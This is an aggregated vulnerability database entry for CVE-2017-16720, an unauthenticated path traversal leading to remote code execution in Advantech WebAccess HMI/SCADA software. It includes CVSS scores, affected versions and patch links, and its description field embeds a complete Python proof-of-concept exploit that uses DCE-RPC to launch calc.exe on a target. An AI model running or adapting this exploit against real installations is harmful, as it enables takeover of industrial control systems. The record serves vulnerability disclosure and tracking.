ID

VAR-201801-0150


CVE

CVE-2017-16720


TITLE

Advantech WebAccess Path traversal vulnerability

Trust: 2.2

sources: IVD: e2e0b982-39ab-11e9-bc27-000c29342cb1 // CNVD: CNVD-2018-00670 // JVNDB: JVNDB-2017-011765 // CNNVD: CNNVD-201801-243

DESCRIPTION

A Path Traversal issue was discovered in WebAccess versions 8.3.2 and earlier. An attacker has access to files within the directory structure of the target device. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to execute code under the context of Administrator. An attacker can leverage this vulnerability to delete files accessible to the web service. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Multiple denial-of-service vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. #!/usr/bin/python2.7 # Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability # Date: 03-11-2018 # Exploit Author: Chris Lyne (@lynerc) # Vendor Homepage: www.advantech.com # Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe # Version: Advantech WebAccess 8.2-2017.08.18 # Tested on: Windows Server 2008 R2 Enterprise 64-bit # CVE : CVE-2017-16720 # See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/ import sys, struct from impacket import uuid from impacket.dcerpc.v5 import transport def call(dce, opcode, stubdata): dce.call(opcode, stubdata) res = -1 try: res = dce.recv() except Exception, e: print "Exception encountered..." + str(e) sys.exit(1) return res if len(sys.argv) != 2: print "Provide only host arg" sys.exit(1) port = 4592 interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc" version = "1.0" host = sys.argv[1] string_binding = "ncacn_ip_tcp:%s" % host trans = transport.DCERPCTransportFactory(string_binding) trans.set_dport(port) dce = trans.get_dce_rpc() dce.connect() print "Binding..." iid = uuid.uuidtup_to_bin((interface, version)) dce.bind(iid) print "...1" stubdata = struct.pack("<III", 0x00, 0xc351, 0x04) call(dce, 2, stubdata) print "...2" stubdata = struct.pack("<I", 0x02) res = call(dce, 4, stubdata) if res == -1: print "Something went wrong" sys.exit(1) res = struct.unpack("III", res) if (len(res) < 3): print "Received unexpected length value" sys.exit(1) print "...3" # ioctl 0x2711 stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204) command = "..\\..\\windows\\system32\\calc.exe" fmt = "<" + str(0x204) + "s" stubdata += struct.pack(fmt, command) call(dce, 1, stubdata) print "\nDid it work?" dce.disconnect()

Trust: 4.14

sources: NVD: CVE-2017-16720 // JVNDB: JVNDB-2017-011765 // ZDI: ZDI-18-024 // ZDI: ZDI-18-056 // CNVD: CNVD-2018-00670 // BID: 102424 // IVD: e2e0b982-39ab-11e9-bc27-000c29342cb1 // VULHUB: VHN-107671 // VULMON: CVE-2017-16720 // PACKETSTORM: 146743

IOT TAXONOMY

category:['ICS']sub_category: -

Trust: 0.8

sources: IVD: e2e0b982-39ab-11e9-bc27-000c29342cb1 // CNVD: CNVD-2018-00670

AFFECTED PRODUCTS

vendor:advantechmodel:webaccessscope: - version: -

Trust: 1.4

vendor:advantechmodel:webaccessscope:ltversion:8.3

Trust: 1.4

vendor:advantechmodel:webaccessscope:lteversion:8.3.2

Trust: 1.0

vendor:advantechmodel:webaccessscope:eqversion:8.1

Trust: 0.9

vendor:advantechmodel:webaccessscope:eqversion:7.2

Trust: 0.9

vendor:advantechmodel:webaccessscope:eqversion:8.3.2

Trust: 0.6

vendor:advantechmodel:webaccessscope:eqversion:8.0

Trust: 0.6

vendor:advantechmodel:webaccess 8.2 20170330scope: - version: -

Trust: 0.3

vendor:advantechmodel:webaccessscope:eqversion:8.2

Trust: 0.3

vendor:advantechmodel:webaccess 8.1 20160519scope: - version: -

Trust: 0.3

vendor:advantechmodel:webaccess 8.0 20150816scope: - version: -

Trust: 0.3

vendor:advantechmodel:webaccessscope:eqversion:8

Trust: 0.3

vendor:advantechmodel:webaccessscope:neversion:8.3

Trust: 0.3

vendor:webaccessmodel: - scope:eqversion:*

Trust: 0.2

sources: IVD: e2e0b982-39ab-11e9-bc27-000c29342cb1 // ZDI: ZDI-18-024 // ZDI: ZDI-18-056 // CNVD: CNVD-2018-00670 // BID: 102424 // JVNDB: JVNDB-2017-011765 // CNNVD: CNNVD-201801-243 // NVD: CVE-2017-16720

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-16720
value: CRITICAL

Trust: 1.0

NVD: CVE-2017-16720
value: HIGH

Trust: 0.8

ZDI: CVE-2017-16720
value: HIGH

Trust: 0.7

ZDI: CVE-2017-16720
value: MEDIUM

Trust: 0.7

CNVD: CNVD-2018-00670
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201801-243
value: CRITICAL

Trust: 0.6

IVD: e2e0b982-39ab-11e9-bc27-000c29342cb1
value: CRITICAL

Trust: 0.2

VULHUB: VHN-107671
value: HIGH

Trust: 0.1

VULMON: CVE-2017-16720
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2017-16720
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.1

NVD: CVE-2017-16720
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

ZDI: CVE-2017-16720
severity: HIGH
baseScore: 9.3
vectorString: AV:N/AC:M/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.6
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.7

ZDI: CVE-2017-16720
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.7

CNVD: CNVD-2018-00670
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

IVD: e2e0b982-39ab-11e9-bc27-000c29342cb1
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.9 [IVD]

Trust: 0.2

VULHUB: VHN-107671
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2017-16720
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.0

NVD: CVE-2017-16720
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: IVD: e2e0b982-39ab-11e9-bc27-000c29342cb1 // ZDI: ZDI-18-024 // ZDI: ZDI-18-056 // CNVD: CNVD-2018-00670 // VULHUB: VHN-107671 // VULMON: CVE-2017-16720 // JVNDB: JVNDB-2017-011765 // CNNVD: CNNVD-201801-243 // NVD: CVE-2017-16720

PROBLEMTYPE DATA

problemtype:CWE-22

Trust: 1.9

sources: VULHUB: VHN-107671 // JVNDB: JVNDB-2017-011765 // NVD: CVE-2017-16720

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 146743 // CNNVD: CNNVD-201801-243

TYPE

Path traversal

Trust: 0.8

sources: IVD: e2e0b982-39ab-11e9-bc27-000c29342cb1 // CNNVD: CNNVD-201801-243

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-011765

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-107671 // VULMON: CVE-2017-16720

PATCH

title:Advantech has issued an update to correct this vulnerability.url:https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02

Trust: 1.4

title:Advantech WebAccessurl:http://www.advantech.com/industrial-automation/webaccess

Trust: 0.8

title:Advantech WebAccess Path Traversal Vulnerability Patchurl:https://www.cnvd.org.cn/patchInfo/show/113121

Trust: 0.6

title:Advantech WebAccess Repair measures for path traversal vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=77554

Trust: 0.6

sources: ZDI: ZDI-18-024 // ZDI: ZDI-18-056 // CNVD: CNVD-2018-00670 // JVNDB: JVNDB-2017-011765 // CNNVD: CNNVD-201801-243

EXTERNAL IDS

db:NVDid:CVE-2017-16720

Trust: 5.2

db:BIDid:102424

Trust: 3.5

db:ZDIid:ZDI-18-024

Trust: 2.5

db:ICS CERTid:ICSA-18-004-02

Trust: 2.1

db:TENABLEid:TRA-2018-23

Trust: 1.8

db:EXPLOIT-DBid:44278

Trust: 1.8

db:CNNVDid:CNNVD-201801-243

Trust: 0.9

db:CNVDid:CNVD-2018-00670

Trust: 0.8

db:ICS CERTid:ICSA-18-004-02A

Trust: 0.8

db:JVNDBid:JVNDB-2017-011765

Trust: 0.8

db:ZDI_CANid:ZDI-CAN-4992

Trust: 0.7

db:ZDI_CANid:ZDI-CAN-5058

Trust: 0.7

db:ZDIid:ZDI-18-056

Trust: 0.7

db:CXSECURITYid:WLB-2018030106

Trust: 0.6

db:IVDid:E2E0B982-39AB-11E9-BC27-000C29342CB1

Trust: 0.2

db:PACKETSTORMid:146743

Trust: 0.2

db:VULHUBid:VHN-107671

Trust: 0.1

db:VULMONid:CVE-2017-16720

Trust: 0.1

sources: IVD: e2e0b982-39ab-11e9-bc27-000c29342cb1 // ZDI: ZDI-18-024 // ZDI: ZDI-18-056 // CNVD: CNVD-2018-00670 // VULHUB: VHN-107671 // VULMON: CVE-2017-16720 // BID: 102424 // JVNDB: JVNDB-2017-011765 // PACKETSTORM: 146743 // CNNVD: CNNVD-201801-243 // NVD: CVE-2017-16720

REFERENCES

url:https://ics-cert.us-cert.gov/advisories/icsa-18-004-02

Trust: 3.5

url:http://www.securityfocus.com/bid/102424

Trust: 3.3

url:https://www.exploit-db.com/exploits/44278/

Trust: 1.9

url:https://www.tenable.com/security/research/tra-2018-23

Trust: 1.8

url:https://www.zerodayinitiative.com/advisories/zdi-18-024/

Trust: 1.8

url:https://nvd.nist.gov/vuln/detail/cve-2017-16720

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16720

Trust: 0.8

url:https://ics-cert.us-cert.gov/advisories/icsa-18-004-02a

Trust: 0.8

url:https://cxsecurity.com/issue/wlb-2018030106

Trust: 0.6

url:http://webaccess.advantech.com

Trust: 0.3

url:https://cwe.mitre.org/data/definitions/22.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://www.advantech.com

Trust: 0.1

url:http://advcloudfiles.advantech.com/web/download/webaccess/8.2/advantechwebaccessusanode8.2_20170817.exe

Trust: 0.1

sources: ZDI: ZDI-18-024 // ZDI: ZDI-18-056 // CNVD: CNVD-2018-00670 // VULHUB: VHN-107671 // VULMON: CVE-2017-16720 // BID: 102424 // JVNDB: JVNDB-2017-011765 // PACKETSTORM: 146743 // CNNVD: CNNVD-201801-243 // NVD: CVE-2017-16720

CREDITS

Steven Seeley (mr_me) of Offensive Security

Trust: 0.7

sources: ZDI: ZDI-18-024

SOURCES

db:IVDid:e2e0b982-39ab-11e9-bc27-000c29342cb1
db:ZDIid:ZDI-18-024
db:ZDIid:ZDI-18-056
db:CNVDid:CNVD-2018-00670
db:VULHUBid:VHN-107671
db:VULMONid:CVE-2017-16720
db:BIDid:102424
db:JVNDBid:JVNDB-2017-011765
db:PACKETSTORMid:146743
db:CNNVDid:CNNVD-201801-243
db:NVDid:CVE-2017-16720

LAST UPDATE DATE

2024-08-14T13:46:13.780000+00:00


SOURCES UPDATE DATE

db:ZDIid:ZDI-18-024date:2018-09-13T00:00:00
db:ZDIid:ZDI-18-056date:2018-01-05T00:00:00
db:CNVDid:CNVD-2018-00670date:2018-01-10T00:00:00
db:VULHUBid:VHN-107671date:2019-10-09T00:00:00
db:VULMONid:CVE-2017-16720date:2019-10-09T00:00:00
db:BIDid:102424date:2018-01-04T00:00:00
db:JVNDBid:JVNDB-2017-011765date:2018-04-03T00:00:00
db:CNNVDid:CNNVD-201801-243date:2021-08-18T00:00:00
db:NVDid:CVE-2017-16720date:2019-10-09T23:25:14.487

SOURCES RELEASE DATE

db:IVDid:e2e0b982-39ab-11e9-bc27-000c29342cb1date:2018-01-10T00:00:00
db:ZDIid:ZDI-18-024date:2018-09-13T00:00:00
db:ZDIid:ZDI-18-056date:2018-01-05T00:00:00
db:CNVDid:CNVD-2018-00670date:2018-01-10T00:00:00
db:VULHUBid:VHN-107671date:2018-01-05T00:00:00
db:VULMONid:CVE-2017-16720date:2018-01-05T00:00:00
db:BIDid:102424date:2018-01-04T00:00:00
db:JVNDBid:JVNDB-2017-011765date:2018-01-25T00:00:00
db:PACKETSTORMid:146743date:2018-03-13T02:22:22
db:CNNVDid:CNNVD-201801-243date:2018-01-08T00:00:00
db:NVDid:CVE-2017-16720date:2018-01-05T08:29:00.317